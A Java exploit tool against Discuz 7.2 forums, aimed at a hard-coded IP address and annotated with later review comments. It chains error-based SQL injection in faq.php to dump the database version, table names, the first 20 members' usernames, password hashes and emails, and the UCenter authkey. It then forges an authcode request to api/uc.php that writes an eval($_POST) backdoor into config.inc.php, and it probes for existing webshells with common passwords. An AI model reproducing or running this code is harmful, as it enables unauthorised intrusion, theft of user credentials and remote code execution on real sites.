Discuz7.2.java
检测shell、获取基本信息、列举当前数据库下所有表、统计会员数量、输出前20位会员id+密码+email、getshell
import java.io.ByteArrayOutputStream;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.codec.digest.DigestUtils;
import org.apache.commons.io.IOUtils;
public class Discuz extends Thread {
    // NOTE(review): extends Thread but never overrides run() and is never start()ed in this
    // file; main() calls startX() directly, so all work runs on the calling thread.
    // Shared counter consumed by get(); nothing else in this file references it.
    static int i = 0;

    /**
     * Emulates PHP's microtime(): "0.&lt;fraction&gt; &lt;first 10 digits&gt;" built from
     * System.nanoTime(). Its only caller in this file is auth(), which hashes the result to
     * derive a short varying salt, so the exact value is irrelevant as long as it varies.
     * NOTE(review): nanoTime() is not wall-clock time and is documented as possibly
     * negative; a value shorter than 11 characters makes the substring calls throw
     * StringIndexOutOfBoundsException.
     * @return a microtime-like string
     */
    public static String microtime(){
        String a = String.valueOf(System.nanoTime());
        // characters 10..len-2 become the "fraction"; the first 10 stand in for the seconds
        return "0."+a.substring(10,a.length()-1)+" "+a.substring(0,10);
    }

    /**
     * Unboxes a Byte[] into a byte[] by writing each element through a ByteArrayOutputStream.
     * @param b boxed bytes; a null element throws NullPointerException when unboxed
     * @return the same bytes, unboxed, in order
     */
    protected static byte[] toByteArray(Byte[] b) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        for (byte bs : b) {
            bos.write(bs);
        }
        return bos.toByteArray();
    }

    /**
     * Discuz/UCenter authorization encoding (ENCODE direction). Appears to be a port of
     * PHP's authcode(): an RC4-style key schedule and keystream keyed by md5 digests of
     * {@code ucKey}, applied to a 10-digit zero field, a 16-char md5 check value and the
     * plaintext, then base64-encoded with '=' padding stripped and prefixed by the 4-char salt.
     * Key derivation: key = md5(ucKey); keya = md5(key[0..16)); keyb = md5(key[16..32));
     * keyc = last 4 hex chars of md5(microtime()); cryptkey = keya + md5(keya + keyc).
     * NOTE(review): the cipher runs over UTF-16 chars and casts each result to a byte, so
     * for non-ASCII input the output diverges from PHP, which works on raw bytes.
     * NOTE(review): box is a 256-entry LinkedHashMap&lt;Integer,Integer&gt; used purely as an
     * int[256]; every lookup boxes/unboxes. The loop variables named i shadow the static
     * field i.
     * @param $string plaintext to encode (only ASCII round-trips faithfully, see above)
     * @param ucKey shared key whose md5 seeds the key schedule
     * @return keyc followed by the unpadded base64 ciphertext
     */
    public static String auth(String $string,String ucKey){
        int $ckey_length = 4;
        String $key = DigestUtils.md5Hex(ucKey);
        String $keya = DigestUtils.md5Hex($key.substring(0,16));
        String $keyb = DigestUtils.md5Hex($key.substring(16,32));
        String microtime = DigestUtils.md5Hex(microtime());
        // the per-call salt: trailing $ckey_length hex chars of md5(microtime())
        String $keyc = microtime.substring(microtime.length()-$ckey_length,microtime.length());
        String $cryptkey = $keya+DigestUtils.md5Hex($keya+$keyc);
        // 16-char integrity value over plaintext + keyb
        String sb = DigestUtils.md5Hex($string+$keyb).substring(0,16);
        // "%010d" of 0 -> ten zeros; presumably authcode's expiry field, fixed to "never"
        $string = String.format("%010d", 0 )+sb+$string;
        int $string_length = $string.length();
        // identity permutation 0..255
        Map<Integer,Integer> box = new LinkedHashMap<Integer, Integer>();
        for (int i = 0; i <= 255; i++) {
            box.put(i, i);
        }
        // key bytes repeated cyclically to 256 entries
        List<Integer> ls = new ArrayList<Integer>();
        char[] $cryptkeyArray = $cryptkey.toCharArray();
        int r = 0;
        for (int i = 0; i <= 255; i++) {
            r = r==$cryptkeyArray.length?0:r;
            ls.add((int)$cryptkeyArray[r]);
            r ++;
        }
        // key-scheduling pass: swap box[i] with box[p]
        int p = 0;
        for(int i= 0; i < 256; i++) {
            int $tmp = (Integer)box.get(i);
            p = (p+$tmp + ls.get(i)) % 256;
            box.put(i, box.get(p));
            box.put(p, $tmp);
        }
        // keystream pass: each char XORed with box[(box[a]+box[j]) % 256], result truncated to a byte
        List<Byte> bs = new ArrayList<Byte>();
        char[] $stringArray = $string.toCharArray();
        int a=0,j=0;
        for(int i = 0; i < $string_length; i++) {
            a = (a + 1) % 256;
            j = (j + box.get(a)) % 256;
            int $tmp = box.get(a);
            box.put(a, box.get(j));
            box.put(j, $tmp);
            int s = ((int)$stringArray[i] ^ box.get((box.get(a) + box.get(j)) % 256));
            bs.add((byte)s);
        }
        byte[] bb = toByteArray(bs.toArray(new Byte[bs.size()]));
        return $keyc+(Base64.encodeBase64String(bb).replace("=", ""));
    }

    /**
     * Emulates PHP's time(): the first 10 characters of the millisecond epoch, i.e. whole
     * seconds for a 13-digit millisecond value.
     * @return epoch seconds as a string
     */
    public static String time(){
        return String.valueOf(System.currentTimeMillis()).substring(0,10);
    }

    /**
     * Sends an HTTP POST with {@code $cmd} as the raw body and returns the response as UTF-8.
     * No Content-Type header is set, the body is encoded with the platform default charset
     * ({@code getBytes()} without a charset), and neither stream is closed.
     * NOTE(review): for https URLs SslUtils.ignoreSsl() (not in this file) is called; per the
     * original comment it disables certificate validation for the whole JVM.
     * NOTE(review): any exception is printed and the URL itself is returned, so callers
     * cannot distinguish a failed request from a response body; the callers here only test
     * {@code contains("12345")}, which a URL never satisfies.
     * @param $cmd POST body
     * @param $url target URL
     * @param timeOut connect and read timeout in milliseconds
     * @return the response body, or {@code $url} when the request failed
     */
    public static String send(String $cmd,String $url,int timeOut){
        try {
            URL u = new URL($url);
            // skip HTTPS certificate validation
            if("https".equalsIgnoreCase(u.getProtocol())){
                SslUtils.ignoreSsl();
            }
            URLConnection conn = u.openConnection();
            conn.setConnectTimeout(timeOut);
            conn.setReadTimeout(timeOut);
            conn.setDoOutput(true);
            conn.setDoInput(true);
            conn.getOutputStream().write($cmd.getBytes());
            return IOUtils.toString(conn.getInputStream(),"UTF-8");
        } catch (Exception e) {
            e.printStackTrace();
        }
        return $url;
    }

    /**
     * Signs {@code "time=<now+10h>&action=updateapps"} with auth(ucKey), URL-encodes the
     * result as the {@code code} value, then POSTs two XML documents to {@code $url + code}
     * and prints each response. The timestamp is pushed 10 hours ahead of time().
     * The only checked exception is the UnsupportedEncodingException from URLEncoder, which
     * cannot occur for "UTF-8"; send() handles its own failures.
     * @param $url URL prefix ending in the query parameter the code is appended to
     * @param ucKey key passed to auth()
     */
    public void test(String $url,String ucKey){
        String timestamp = String.valueOf(Long.parseLong(time())+10*3600);
        try {
            String $code = URLEncoder.encode(auth("time="+timestamp+"&action=updateapps", ucKey),"UTF-8");
            String $cmd1="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><root><item id=\"UC_API\">xxx\');eval($_POST[xxs]);//</item></root>";
            String $cmd2="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><root><item id=\"UC_API\">aaa</item></root>";
            String $html1 = send($cmd1, $url+$code, 5000);
            System.out.println($html1);
            String $html2 = send($cmd2, $url+$code, 5000);
            System.out.println($html2);
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }
    }

    /**
     * POST variant used by getR(): same as send() but without the https hook, the response
     * decoded as GBK instead of UTF-8, and failures propagated instead of swallowed.
     * NOTE(review): the request body again uses the platform default charset.
     * @param url target URL
     * @param action POST body
     * @param timeOut connect and read timeout in milliseconds
     * @return the response body decoded as GBK
     * @throws Exception on any connection or I/O failure
     */
    public static String getRequest(String url,String action,int timeOut) throws Exception{
        URL u = new URL(url);
        URLConnection conn = u.openConnection();
        conn.setConnectTimeout(timeOut);
        conn.setReadTimeout(timeOut);
        conn.setDoOutput(true);
        conn.getOutputStream().write(action.getBytes());
        return IOUtils.toString(conn.getInputStream(),"GBK");
    }

    /**
     * Returns the current value of the static counter i and increments it.
     * NOTE(review): this is an instance method, so it locks on {@code this} while guarding a
     * static field; two Discuz instances would not be serialized against each other. Not
     * called anywhere in this file.
     * @return the pre-increment counter value
     */
    public synchronized int get(){
        return i++;
    }

    /**
     * POSTs {@code action} to {@code url} and extracts the text between the first
     * {@code {#} and {@code #}} markers in the response.
     * The regex uses a greedy {@code .*} that does not cross line breaks.
     * @param url target URL
     * @param action POST body
     * @return the first captured group, or "" when the markers are absent
     * @throws Exception propagated from getRequest()
     */
    public String getR(String url,String action) throws Exception{
        String str = getRequest(url,action,5000);
        String reg = "\\{#(.*)#\\}";
        Matcher m = Pattern.compile(reg).matcher(str);
        if(m.find()){
            return m.group(1);
        }
        return "";
    }

    /**
     * Driver for the steps listed in the file header, run against the single URL hard-coded
     * below (a literal host, not a parameter). Sections, in order: probe config.inc.php with
     * a fixed parameter-name list; read version/user/database; list the tables and derive the
     * table prefix; print up to 20 member rows; read authkey in 32-char slices; call test().
     * {@code exp} is a request template whose literal {@code $sql} token is substituted per step.
     * NOTE(review): getR() returns "" when the markers are missing, so each
     * Integer.parseInt() below throws NumberFormatException; for len1 and len3 that escapes
     * to the outer catch and aborts the run, for len2 it is caught by the inner catch.
     * NOTE(review): the default prefix "cdb" has no trailing underscore, so if no table name
     * contains "forums" the members query targets "cdbmembers"; the default
     * {@code applications} value does include the underscore. The loop variables named i
     * shadow the static field i, and {@code t} and {@code a} hold the same value.
     */
    public void startX(){
        String url = "http://218.249.66.48/dz7.2/faq.php";
        String exp = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,($sql),0x3a)x from information_schema.tables group by x)a)%23";
        try {
            System.out.println("-----------------------检查是否存在shell----------------------");
            // base URL: everything before "faq.php"
            String t = url.substring(0,url.indexOf("faq.php"));
            String[] arr = "cmd,xxx,a,cao,i0day,caonima,2119,air,config,moon,1,moi1,DOM,g,pwd,xss".split(",");
            for (int i = 0; i < arr.length; i++) {
                String y = send(arr[i]+"=echo 12345;", t+"/config.inc.php", 5000);
                // the marker is echoed only when the parameter name is accepted; stop early
                if(y.contains("12345")){
                    System.out.println("Shell:"+t+"/config.inc.php\t\t密码:"+arr[i]+"\r\n");
                    return ;
                }
            }
            System.out.println("---------------------info------------------------");
            String info = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,version(),0x23,user(),0x23,database(),0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1"));
            System.out.println(info);
            // number of tables in the current database; "" from getR() throws here
            int len1 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,count(1),0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1")));
            String pre = "cdb";
            String applications = "cdb_uc_applications";
            System.out.println("----------------------table-----------------------");
            boolean install = false;
            for (int i = 0; i < len1; i++) {
                String str = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,table_name,0x23,0x7D) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit "+i+",1")).replace("[Table]", "cdb_");
                // prefix = the forums table name up to and including its first underscore
                if(str.contains("forums")){
                    pre = str.indexOf("_")!=-1?str.substring(0,str.indexOf("_")+1):"";
                }
                if(str.contains("applications")){
                    applications = str;
                    install = true;
                }
                System.out.println(str);
            }
            System.out.println("---------------------members------------------------");
            try {
                int len2 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,count(1),0x23,0x7D) from "+pre+"members" +" limit 0,1")));
                System.out.println("会员总数量:"+len2);
                // at most 20 rows
                for (int i = 0; i < (len2>20?20:len2);i++) {
                    String str = getR(url, exp.replace("$sql", "select concat(0x7b,0x23,uid,0x2c,username,0x2c,password,0x2c,email,0x23,0x7D) from "+pre+"members" +" limit "+i+",1"));
                    if(!"".equals(str)){
                        System.out.println(str);
                    }
                }
            } catch (Exception e) {
                // failures in this section are reported and the run continues
                System.out.println(e.toString());
            }
            if(!install){
                System.out.println("没有找到applications,程序退出,");
                return ;
            }
            System.out.println("-----------------------discuz表前缀:"+(pre.length()==0?"没有前缀":pre)+"----------------------");
            System.out.println("-----------------------uc_key----------------------");
            int len3 = Integer.parseInt(getR(url, exp.replace("$sql", "select concat(0x7b,0x23,length(authkey),0x23,0x7D) from "+applications +" limit 0,1")));
            StringBuilder sb = new StringBuilder();
            // len3/32+1 slices of 32 chars; when len3 is a multiple of 32 the last slice is empty
            for (int i = 1; i <= len3/32+1; i++) {
                String sql = exp.replace("$sql", "select concat(0x7b,0x23,substr(authkey,"+((i-1)*32+1)+",32),0x23,0x7D) from "+applications +" limit 0,1");
                sb.append(getR(url, sql));
            }
            System.out.println(sb);
            System.out.println("-----------------------getshell----------------------");
            // same value as t above
            String a = url.substring(0,url.indexOf("faq.php"));
            test(a+"/api/uc.php?code=", sb.toString());
            String b = send("xxs=echo 12345;", a+"/config.inc.php", 5000);
            if(b.contains("12345")){
                System.out.println("Shell:"+a+"/config.inc.php\r\n");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Entry point: runs startX() on a fresh instance on the main thread (no Thread.start()).
     * @param args ignored; the target URL is hard-coded in startX()
     * @throws Exception declared but nothing in startX() propagates
     */
    public static void main(String[] args) throws Exception {
        new Discuz().startX();
    }
}